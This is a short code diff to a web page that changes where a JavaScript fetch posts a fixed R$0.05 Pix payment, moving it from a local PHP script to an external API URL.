--- a/index2.html
+++ b/index2.html
@@ -172,7 +172,7 @@
                 value: 0.05  // Valor fixo de R$0,05
             };
 
-            fetch('process_pix.php', {
+            fetch('https://api.captchapay.org/captcha/process_pix.php', {
                 method: 'POST',
                 headers: {
                     'Content-Type': 'application/json'
